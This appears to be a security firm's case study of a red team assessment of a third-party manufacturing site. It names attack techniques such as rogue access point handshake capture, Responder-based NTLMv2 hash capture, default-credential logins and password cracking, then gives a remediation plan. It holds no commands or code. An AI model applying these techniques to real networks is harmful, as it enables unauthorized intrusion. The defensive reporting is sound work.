A leading consumer products company sought to assess the security posture of its supply chain by conducting a supply chain red team assessment. The objective was to evaluate security gaps in a third-party manufacturing site and its connectivity to the company’s internal IT environment. The assessment followed a zero-knowledge approach, simulating real-world attack scenarios to identify potential vulnerabilities and areas for improvement.

The assessment focused on:

• Identifying potential network paths between the organization’s network and the third-party manufacturing site.
• Assessing network reachability from the third-party site to the organization’s internal infrastructure.
• Discovering vulnerabilities in network devices and configurations that could be exploited to gain unauthorized access.

During the engagement, several critical security weaknesses were identified:

1. Unauthorized LAN Access

The team identified that the internal network lacked proper access controls, allowing unauthorized machines to connect to the LAN. By locating an open Ethernet port and requesting a DHCP lease, an attacker could obtain an IP address without authentication. This provided direct access to internal network resources, allowing the attacker to conduct reconnaissance, sniff network traffic, and pivot to other systems.

2. Insecure Wi-Fi Configuration

The enterprise Wi-Fi network was found to be vulnerable to unauthorized access due to weak authentication mechanisms. Using a rogue access point attack, the team was able to capture WPA2 handshakes and crack network credentials. Furthermore, inadequate rogue access point detection left the network exposed to man-in-the-middle (MITM) attacks, allowing attackers to intercept sensitive data.

3. Weak Application Security

Several critical applications, including a Tomcat server, were running with default administrative credentials. This allowed the red team to log in with commonly known default credentials and gain control over the applications. From this foothold, attackers could manipulate configurations, upload malicious payloads, and escalate privileges to access sensitive business data.

4. Exploitable Windows Protocols

The assessment revealed that Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) were enabled on multiple systems, making them susceptible to spoofing attacks. By deploying a Responder tool on the internal network, the team was able to capture NTLMv2 hashes from authentication requests. These hashes could then be cracked using brute-force techniques or relayed to escalate privileges and gain unauthorized access to internal resources.

5. Weak Password Policy

Multiple user and administrator passwords were found to be weak and easily guessable, that could be found on any commonly known password list. Our team successfully captured authentication hashes from both Wi-Fi and LAN traffic and cracked them using dictionary attacks. Poor password hygiene, coupled with inadequate enforcement of strong password policies, significantly increased the risk of credential theft and unauthorized access.

6. Insecure Active Directory Management

The organization had an excessive number of domain administrator accounts, some of which had weak or easily guessable passwords. Additionally, several service accounts were found to have privileged access and were being used in multiple locations across the network. This widespread presence of privileged accounts increased the risk of lateral movement and privilege escalation attacks.

7. Lack of Multi-Factor Authentication (MFA)

The team was able to compromise an Office 365 administrator account due to the absence of two-factor authentication (2FA). This provided unauthorized access to emails, confidential files, and administrative tools. Without MFA, attackers could use stolen credentials to maintain persistent access to critical systems without detection.

8. Exposure of Building Management Systems (BMS)

The assessment revealed that the Building Management System (BMS) interface was accessible from the Wi-Fi network without authentication. This meant an attacker with access to the network could manipulate critical infrastructure, such as HVAC, lighting, and security controls, potentially leading to operational disruptions.

9. Surveillance Cameras with Weak Passwords

Multiple surveillance cameras were found to be using default or weak passwords, allowing unauthorized access to live video feeds. By connecting to the Wi-Fi network and identifying the IP addresses of these cameras, the team was able to log in and access real-time footage. This posed a serious security risk, as attackers could monitor employee movements and security procedures, facilitating physical intrusion attempts.

10. Legacy Wi-Fi Devices with Weak Authentication

A legacy Wi-Fi device, which was no longer in use, was still active within the network and had a weak default password. This device provided an unexpected entry point for attackers, enabling them to gain unauthorized access to the corporate network. Once inside, an attacker could launch man-in-the-middle attacks, intercept sensitive communications, or use the network as a pivot point for further exploitation.

Following the assessment, we worked closely with the organization to mitigate the identified vulnerabilities. A structured remediation plan was developed and implemented, addressing each issue systematically:

• Network security enhancements: Implemented robust network access controls (NAC), disabled insecure Windows protocols, and enforced strong authentication mechanisms for Wi-Fi and LAN access.
• Application security hardening: Updated configurations to remove default credentials, applied access control policies, and enforced strong password policies across all critical applications.
• Active Directory security improvements: Reduced the number of privileged accounts, implemented Privileged Identity Management (PIM), and enforced multi-factor authentication (MFA) for administrative users.
• Infrastructure security upgrades: Restricted access to the Building Management System (BMS), secured surveillance camera configurations, and decommissioned outdated Wi-Fi devices.

By implementing these security measures, the organization significantly improved its security posture, mitigating risks posed by third-party integrations and strengthening its defenses against real-world cyber threats. This engagement highlights the critical importance of proactive security assessments in identifying and remediating vulnerabilities before they can be exploited by malicious actors.